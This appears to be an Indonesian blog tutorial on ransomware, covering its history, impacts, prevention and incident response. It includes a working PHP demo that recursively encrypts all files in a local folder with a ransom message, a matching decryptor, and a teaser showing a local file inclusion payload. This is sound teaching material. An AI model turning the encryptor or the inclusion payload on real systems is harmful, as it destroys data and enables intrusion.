RANSOMWARE

-

 

RANSOMWARE


1. Definisi Ransomware

Ransomware adalah jenis perangkat lunak jahat (malware) yang bertujuan untuk menyerang komputer atau jaringan dengan mengunci atau mengenkripsi data. Setelah data dienkripsi atau dikunci, pelaku akan meminta tebusan kepada korban agar data tersebut dapat dibuka atau diakses kembali. Tebusan ini biasanya diminta dalam bentuk mata uang kripto, seperti Bitcoin, yang sulit dilacak.

2. Sejarah Ransomware

Ransomware pertama kali muncul pada akhir 1980-an. Berikut adalah beberapa peristiwa penting dalam perkembangan ransomware:

  • 1989: AIDS Trojan (PC Cyborg) - Ini adalah ransomware pertama yang diketahui, juga disebut AIDS Trojan atau PC Cyborg. Penyebarannya melalui disket, malware ini menyembunyikan file direktori dan mengenkripsi nama file pada drive C:, kemudian menuntut pembayaran sebesar $189 kepada PC Cyborg Corporation.
  • 2005-2006: Ransomware modern - Mulai muncul jenis ransomware modern yang menggunakan enkripsi lebih canggih dan metode distribusi lebih luas, seperti melalui email atau situs web yang terinfeksi.
  • 2013: CryptoLocker - Salah satu ransomware terkenal yang menyebar melalui lampiran email berbahaya, menggunakan enkripsi RSA, dan menuntut pembayaran dalam bentuk Bitcoin.
  • 2017: WannaCry - Ransomware ini menyebar secara global dan menginfeksi ratusan ribu komputer dalam waktu singkat. WannaCry mengeksploitasi kerentanan dalam sistem operasi Windows yang dikenal sebagai EternalBlue, dieksploitasi oleh kelompok peretas Shadow Brokers.
  • 2020-an: Perkembangan dan peningkatan serangan - Ransomware terus berkembang dengan teknik baru, termasuk model Ransomware-as-a-Service (RaaS), di mana pelaku kejahatan siber menjual atau menyewakan ransomware mereka kepada pihak ketiga.

3. Dampak Ransomware

Serangan ransomware dapat menyebabkan kerugian yang signifikan, baik dari sisi finansial maupun operasional. Beberapa dampak utama dari serangan ransomware meliputi:

  • Kerugian Finansial: Pembayaran tebusan bisa sangat mahal, dan biaya pemulihan data yang terinfeksi juga bisa mencapai jutaan dolar.
  • Gangguan Operasional: Sistem yang terkena ransomware mungkin tidak dapat digunakan hingga data dipulihkan, yang dapat mengganggu operasi bisnis atau layanan publik.
  • Kehilangan Data: Jika data tidak dapat dipulihkan, perusahaan atau individu mungkin kehilangan data penting secara permanen.
  • Kerusakan Reputasi: Serangan ransomware dapat merusak reputasi perusahaan atau organisasi, mengurangi kepercayaan dari pelanggan atau publik.
  • Implikasi Hukum: Ada kemungkinan adanya konsekuensi hukum jika data pribadi atau sensitif terungkap dalam serangan ransomware.

4. Pencegahan Ransomware

Pencegahan serangan ransomware memerlukan pendekatan yang komprehensif, termasuk penggunaan teknologi, pelatihan, dan kebijakan keamanan. Beberapa langkah pencegahan yang dapat diambil meliputi:

  • Backup Data Secara Rutin: Melakukan backup data secara teratur dan menyimpan salinan backup di lokasi yang terpisah dari jaringan utama.
  • Update dan Patch Sistem: Selalu memperbarui perangkat lunak dan sistem operasi dengan patch terbaru untuk mengurangi kerentanan yang dapat dieksploitasi.
  • Gunakan Antivirus dan Antimalware: Menginstal dan memperbarui perangkat lunak antivirus dan antimalware untuk mendeteksi dan memblokir malware sebelum infeksi terjadi.
  • Pelatihan Keamanan: Edukasi karyawan atau pengguna tentang bahaya phishing dan praktik keamanan siber yang baik, termasuk cara mengenali email atau situs web yang mencurigakan.
  • Segmentasi Jaringan: Membatasi akses antar bagian jaringan untuk mencegah penyebaran ransomware jika terjadi infeksi.
  • Aktifkan Firewall dan IPS/IDS: Menggunakan firewall dan sistem deteksi/pencegahan intrusi untuk memonitor dan memblokir aktivitas mencurigakan.
  • Aktifkan Enkripsi Data: Mengenkripsi data penting untuk mengurangi dampak jika data dicuri atau dienkripsi oleh ransomware.

Demo:

  • Buat folder ransomware, di dalam folder tersebut buat lagi folder target_folder
  • Isikan target_folder beberapa file contoh yang akan di encrypt oleh ransomware
  • Buat file encrypt.php dan isikan kode berikut:

<?php
// Generate key
$key = base64_encode(openssl_random_pseudo_bytes(32));

// Simpan kunci ke file (untuk dekripsi nantinya)
file_put_contents('key.txt', $key);

// Fungsi untuk mengenkripsi file
function encryptFile($file, $key) {
    $data = file_get_contents($file);
    $method = 'aes-256-cbc';
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
    $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
    $encrypted .= '::' . base64_encode($iv);
    file_put_contents($file, $encrypted);
}

// Tentukan folder yang akan dienkripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        encryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
?>

    • Jalankan serangan ransomware di browser dengan mengetikkan http://localhost/ransomware/encrypt.php 





    • Cek folder target_folder dan buka isi filenya 



    • Folder yang semula bisa terbuka, menjadi terkunci ketika mendapatkan ransomware

    Bentuk mitigasi yang bisa dilakukan

  • Buat file decrypt.php dengan kode berikut untuk mendekripsi file yang terenkripsi:


    • <?php
    // Load the key from the file
    $key = file_get_contents('key.txt');

    // Fungsi untuk mendekripsi file
    function decryptFile($file, $key) {
        $data = file_get_contents($file);
        list($encrypted_data, $iv) = explode('::', $data, 2);
        $method = 'aes-256-cbc';
        $decrypted = openssl_decrypt($encrypted_data, $method, $key, 0, base64_decode($iv));
        file_put_contents($file, $decrypted);
    }

    // Tentukan folder yang akan didekripsi
    $folder = './target_folder';

    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
    foreach ($files as $file) {
        if ($file->isFile()) {
            decryptFile($file->getRealPath(), $key);
        }
    }
    echo "Semua file telah didekripsi.";
    ?>


    Jalankan file tersebut dengan mengetikkan: http://localhost/ransomware/decrypt.php 


    Dan lihat kembali di folder target_folder


    File yang semula terkunci, kini sudah bisa terbuka kembali.

    Pencegahan Pasca Serangan Ransomware

    Setelah mengalami serangan ransomware, penting untuk mengambil langkah-langkah untuk mengurangi kerusakan lebih lanjut dan mencegah serangan serupa di masa mendatang. Berikut ini adalah panduan untuk pencegahan setelah serangan ransomware:

    1. Isolasi dan Kontrol Kerusakan

      • Isolasi Sistem yang Terinfeksi: Segera pisahkan komputer atau sistem yang terkena ransomware dari jaringan utama untuk mencegah penyebaran lebih lanjut ke perangkat lain.
      • Matikan Jaringan: Jika diperlukan, matikan jaringan secara keseluruhan untuk menghentikan penyebaran ransomware hingga situasi terkendali.

    2. Identifikasi dan Hapus Ransomware

      • Identifikasi Jenis Ransomware: Gunakan alat dan layanan yang tersedia untuk mengidentifikasi jenis ransomware yang menyerang sistem Anda. Ini akan membantu menentukan langkah pemulihan yang sesuai.
      • Hapus Ransomware: Gunakan perangkat lunak antivirus dan antimalware untuk membersihkan sistem dari ransomware. Pastikan semua salinan ransomware telah dihapus sebelum mencoba memulihkan data.

    3. Pemulihan Data

      • Gunakan Backup: Jika Anda memiliki cadangan data, gunakan cadangan tersebut untuk memulihkan data yang terkena ransomware. Pastikan cadangan tersebut bebas dari infeksi sebelum digunakan.
      • Alat Dekripsi: Cari alat dekripsi yang mungkin tersedia untuk jenis ransomware tertentu. Beberapa organisasi keamanan siber menyediakan alat dekripsi gratis untuk ransomware yang sudah dikenal.

    4. Laporkan Insiden

      • Lapor ke Pihak Berwenang: Laporkan insiden ransomware kepada pihak berwenang, seperti lembaga penegak hukum atau badan keamanan siber nasional. Ini dapat membantu dalam investigasi dan penanggulangan kejahatan siber.
      • Lapor ke Regulator: Jika serangan ransomware melibatkan data pribadi atau sensitif, laporkan insiden tersebut kepada regulator yang relevan, seperti komisi perlindungan data.

    5. Evaluasi dan Pembelajaran

      • Analisis Forensik: Lakukan analisis forensik untuk memahami bagaimana serangan terjadi, jalur infeksi, dan kerentanan yang dieksploitasi.
      • Evaluasi Proses Keamanan: Tinjau kembali kebijakan dan prosedur keamanan siber yang ada. Identifikasi kelemahan dan lakukan perbaikan yang diperlukan untuk mencegah serangan serupa di masa depan.

    6. Tingkatkan Keamanan

      • Pembaruan dan Patch: Pastikan semua perangkat lunak, sistem operasi, dan aplikasi diperbarui dengan patch keamanan terbaru.
      • Pelatihan Karyawan: Tingkatkan program pelatihan keamanan siber untuk karyawan, termasuk cara mengenali dan merespons ancaman phishing dan malware.
      • Implementasi Keamanan Berlapis: Terapkan pendekatan keamanan berlapis yang mencakup firewall, sistem deteksi dan pencegahan intrusi (IDS/IPS), serta solusi keamanan endpoint.
      • Segmentasi Jaringan: Pisahkan jaringan untuk membatasi akses antar bagian jaringan dan mencegah penyebaran malware.

    7. Kebijakan dan Prosedur Baru

      • Rencana Respons Insiden: Kembangkan atau perbarui rencana respons insiden untuk memastikan tindakan cepat dan efektif jika terjadi serangan ransomware di masa depan.
      • Kebijakan Backup: Pastikan kebijakan backup yang kuat dengan jadwal backup rutin dan verifikasi integritas data cadangan.
      • Kebijakan Akses: Tinjau kembali kebijakan akses untuk memastikan hanya individu yang memiliki hak akses yang diperlukan untuk data dan sistem tertentu.

    Komentar

    Posting Komentar

    Postingan populer dari blog ini

    LOCAL/REMOTE FILE INCLUSION

    -
    Gambar
     LOCAL/REMOTE FILE INCLUSION DEMO 1: SERANGAN LFI  • Buat sebuah folder di C:\xampp\htdocs\ bernama lfi.  •Di dalam folder lfi, buat file bernama index.php dengan isi sebagai berikut: <?php // index.php $page = isset ( $_GET [ 'page' ]) ? $_GET [ 'page' ] : 'home.php' ; include ( $page ); • Buat file home.php di folder yang sama dengan isi: <?php echo "Welcome to the home page!" ;  • Buka browser dan akses http://localhost/lfi/index.php. •Untuk membaca file di sistem Windows, kita bisa mencoba membaca file C:\xampp\htdocs\lfi\home.php dengan mengubah parameter URL:  http://localhost/lfi/index.php?page=C:/xampp/htdocs/lfi/home.php  •Coba akses file sensitif seperti konfigurasi Apache:  http://localhost/lfi/index.php?page=C:/xampp/apache/conf/httpd.conf DEMO 2: SERANGAN RFI  • Buat folder di C:\xampp\htdocs\ bernama uploads.  •Buat file upload.php di C:\xampp\htdocs\lfi\ dengan isi sebagai berikut:  <?php if ( $_SERVER [ 'R...
    Baca selengkapnya

    OSINT

    -
      OSINT Open Source Intelligence (OSINT) adalah proses pengumpulan dan analisis informasi yang tersedia  untuk umum dari berbagai sumber terbuka untuk tujuan intelijen. OSINT menggunakan informasi  yang dapat diakses oleh publik dan secara sah, seperti situs web, media sosial, laporan publik, basis  data, dan publikasi lainnya. OSINT digunakan oleh berbagai pihak, termasuk perusahaan,  pemerintah, penegak hukum, dan profesional keamanan siber untuk mengumpulkan informasi yang  relevan dan berharga. Sumber-Sumber OSINT Sumber-sumber OSINT dapat dikategorikan menjadi beberapa jenis, antara lain: 1. Sumber Media:  - Situs berita, artikel, jurnal, dan laporan media. 2. Sumber Internet:  - Situs web perusahaan, blog, forum, dan komunitas online. 3. Media Sosial:  - Platform seperti Facebook, Twitter, LinkedIn, Instagram, dan lainnya. 4. Sumber Pemerintah:  - Laporan publik, data sensus, basis data paten, dan dokumen hukum. 5. Sumber Akademik:...
    Baca selengkapnya

    CROSS SITE REQUEST FORGERY

    -
    Gambar
      CROSS SITE REQUEST FORGERY Apa Itu Cross-Site Request Forgery (CSRF)? Cross-Site Request Forgery (CSRF) adalah salah satu jenis serangan pada aplikasi web di mana penyerang mengeksploitasi identitas pengguna untuk mengirimkan permintaan yang tidak sah ke server aplikasi. CSRF sering kali berhasil karena aplikasi web tidak memverifikasi keaslian permintaan yang datang dari pengguna yang telah diautentikasi. Cara Kerja CSRF Pengguna Login : Pengguna login ke situs web A dan mendapatkan cookie sesi yang sah. Penyerang Membuat Permintaan Berbahaya : Penyerang membuat halaman web berbahaya atau email yang mengandung permintaan berbahaya ke situs web A. Pengguna Mengunjungi Halaman Berbahaya : Pengguna mengunjungi halaman berbahaya tersebut atau membuka email yang mengandung permintaan berbahaya. Permintaan Tidak Sah Dikirim : Karena pengguna sudah login ke situs web A, permintaan berbahaya tersebut dikirim ke server dengan menggunakan cookie sesi pengguna, sehingga permintaan tersebut...
    Baca selengkapnya